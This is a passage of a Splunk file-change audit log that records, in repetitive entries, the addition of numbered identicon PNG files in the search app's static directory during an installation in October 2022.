action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/560.png", isdir=0, size=273, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.489, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/56.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.485, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/559.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.480, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/558.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.476, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/557.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.472, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/556.png", isdir=0, size=293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.469, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/555.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.464, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/554.png", isdir=0, size=396, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.458, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/553.png", isdir=0, size=396, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.454, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/552.png", isdir=0, size=326, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.450, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/551.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.444, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/550.png", isdir=0, size=394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.440, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/55.png", isdir=0, size=392, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.436, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/549.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.432, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/548.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.428, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/547.png", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.424, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/546.png", isdir=0, size=392, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.420, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/545.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.416, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/544.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.413, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/543.png", isdir=0, size=322, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.409, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/542.png", isdir=0, size=358, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.405, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/541.png", isdir=0, size=352, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.401, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/540.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.397, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/54.png", isdir=0, size=385, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.393, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/539.png", isdir=0, size=350, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.389, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/538.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.385, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/537.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.381, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/536.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.376, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/535.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.372, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/534.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.369, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/533.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.364, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/532.png", isdir=0, size=324, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.360, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/531.png", isdir=0, size=312, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.356, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/530.png", isdir=0, size=351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.352, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/53.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.348, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/529.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.344, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/528.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.341, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/527.png", isdir=0, size=378, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.337, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/526.png", isdir=0, size=317, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.333, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/525.png", isdir=0, size=339, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.330, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/524.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.326, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/523.png", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.322, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/522.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.318, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/521.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.315, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/520.png", isdir=0, size=392, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.312, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/52.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.308, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/519.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.305, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/518.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.302, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/517.png", isdir=0, size=362, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.298, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/516.png", isdir=0, size=364, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.294, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/515.png", isdir=0, size=382, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.290, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/514.png", isdir=0, size=346, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.286, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/513.png", isdir=0, size=420, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.282, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/512.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.276, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/511.png", isdir=0, size=294, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.268, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/510.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.263, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/51.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.258, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/509.png", isdir=0, size=386, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.254, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/508.png", isdir=0, size=368, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.248, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/507.png", isdir=0, size=381, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.242, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/506.png", isdir=0, size=351, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.237, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/505.png", isdir=0, size=273, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.231, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/504.png", isdir=0, size=353, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.224, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/503.png", isdir=0, size=366, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.220, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/502.png", isdir=0, size=376, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.214, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/501.png", isdir=0, size=404, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.210, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/500.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.205, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/50.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.201, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/5.png", isdir=0, size=379, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.197, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/499.png", isdir=0, size=330, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.193, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/498.png", isdir=0, size=393, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.189, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/497.png", isdir=0, size=395, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.182, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/496.png", isdir=0, size=316, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.178, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/495.png", isdir=0, size=335, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.174, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/494.png", isdir=0, size=354, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.170, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/493.png", isdir=0, size=397, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.166, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/492.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.162, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/491.png", isdir=0, size=374, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.158, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/490.png", isdir=0, size=388, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.153, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/49.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.149, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/489.png", isdir=0, size=373, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.145, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/488.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.142, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/487.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.137, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/486.png", isdir=0, size=363, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.133, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/485.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.129, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/484.png", isdir=0, size=293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.126, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/483.png", isdir=0, size=288, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.120, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/482.png", isdir=0, size=384, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.116, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/481.png", isdir=0, size=372, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.112, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/480.png", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.106, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/48.png", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.102, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/479.png", isdir=0, size=369, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.098, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/478.png", isdir=0, size=314, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.094, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/477.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.090, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/476.png", isdir=0, size=343, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.086, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/475.png", isdir=0, size=332, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.081, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/474.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.077, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/473.png", isdir=0, size=367, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.074, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/472.png", isdir=0, size=344, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.069, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/471.png", isdir=0, size=348, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.065, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/470.png", isdir=0, size=355, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.061, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/47.png", isdir=0, size=289, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.057, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/469.png", isdir=0, size=365, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.051, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/468.png", isdir=0, size=338, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.046, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/467.png", isdir=0, size=293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.040, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/466.png", isdir=0, size=371, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.035, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/465.png", isdir=0, size=293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.032, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/464.png", isdir=0, size=293, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.028, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/463.png", isdir=0, size=400, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.023, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/462.png", isdir=0, size=389, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.018, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/461.png", isdir=0, size=370, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.014, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/460.png", isdir=0, size=333, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.010, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/46.png", isdir=0, size=356, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.004, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/459.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:54.000, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/458.png", isdir=0, size=375, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.996, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/457.png", isdir=0, size=380, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.992, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/456.png", isdir=0, size=340, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.985, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/455.png", isdir=0, size=315, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.981, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/454.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.978, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/453.png", isdir=0, size=357, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.974, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/452.png", isdir=0, size=359, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:42:53.970, user=n/a, action=add,path="/opt/splunk/etc/apps/search/appserver/static/identicons/451.png", isdir=0, size=383, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 